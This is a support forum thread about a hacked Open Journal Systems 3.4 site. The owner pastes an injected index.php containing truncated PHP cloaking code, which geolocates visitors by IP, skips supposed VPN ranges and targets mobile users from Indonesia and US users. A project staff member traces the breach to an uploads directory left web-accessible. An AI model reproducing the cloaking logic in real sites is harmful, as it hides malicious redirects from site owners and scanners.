Describe the issue or problem
It seems that our website has been attacked. The main page is frozen. The site is: ttps://journals.moleculepub.com/
We checked file in the file manager and found that several files were updated. In particular the index.php was modified. Here is the file:
<?php
session_start();
// Mendeteksi perangkat pengguna (mobile atau desktop) dan negara asal
function isMobileDeviceFromIndonesiaOrUS() {
$ip = $_SERVER['REMOTE_ADDR'];
// Cek apakah hasilnya sudah ada di sesi
if (isset($_SESSION['ip_info'][$ip])) {
$ip_info = $_SESSION['ip_info'][$ip];
} else {
// Mendapatkan info IP dari API
$ip_info = json_decode(file_get_contents("http://ip-api.com/json/$ip"));
// Simpan hasilnya dalam sesi
if ($ip_info) {
$_SESSION['ip_info'][$ip] = $ip_info;
}
}
// Cek juga apakah alamat IP adalah alamat VPN
$vpn_ip_ranges = array(
'1.0.0.0/24',
'2.0.0.0/16',
// Tambahkan alamat IP VPN lain jika diperlukan
);
foreach ($vpn_ip_ranges as $vpn_ip_range) {
if (ip_in_range($ip, $vpn_ip_range)) {
return false; // Jika pengguna menggunakan VPN
}
}
// Jika alamat IP berasal dari Indonesia atau Amerika Serikat
if ($ip_info && ($ip_info->countryCode === 'ID' || $ip_info->countryCode === 'US')) {
// Jika dari Indonesia, periksa apakah perangkat mobile
if ($ip_info->countryCode === 'ID') {
return preg_match('/(android|iphone|ipod|ipad|iemobile|opera mini)/i', $_SERVER['HTTP_USER_AGENT']);
}
// Jika dari Amerika, izinkan akses tanpa batasan
return true;
}
return false; // Untuk negara lain
}
// Fungsi untuk memeriksa apakah alamat IP ada dalam suatu rentang IP
function ip_in_range($ip, $range) {
list($subnet, $mask) = explode('/', $range);
return (ip2long($ip) & ~((1 <
The webpage now is frozen. Has anyone had a similar experience? Any solutions?
Steps I took leading up to the issue
I tried to change the index.php file by deleting the codes above and using the following code, but it did not work:
<?php
/**
* @file ojs/index.php
*
* Copyright (c) 2014-2021 Simon Fraser University
* Copyright (c) 2003-2021 John Willinsky
* Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
*
* Bootstrap code for OJS site. Loads required files and then calls the
* dispatcher to delegate to the appropriate request handler.
*/
use APP\core\Application;
// Initialize global environment
define('INDEX_FILE_LOCATION', __FILE__);
require_once './lib/pkp/includes/bootstrap.php';
// Serve the request
Application::get()->execute();
**What application are you using?**
OJS 3.4
**Additional information**
These are the files that seem to be modified by the attack

Here is the files_dir setting in your configuration file:
[files]
; Complete path to directory to store uploaded files
; (This directory should not be directly web-accessible)
; Windows users should use forward slashes
files_dir = /home4/molecup9/public_html/journals/files
; Path to the directory to store public uploaded files
; (This directory should be web-accessible and the specified path
; should be relative to the base OJS directory)
; Windows users should use forward slashes
public_files_dir = public
This is what I suspected. Because you’ve placed the files directory inside public_html, its contents are directly accessible through the web server, bypassing OJS’s security. This makes your server easy to hack. There’s a warning about this in the configuration file, and on the installation form.
Regards,
Alec Smecher
Public Knowledge Project Team
@abadan Thank you for your suggestion. Just to clarify. So I can keep the folder of the journals where it is now: /home4/molecup9/public_html/journals. And just move the files folder to another place outside the public_html? Is that right?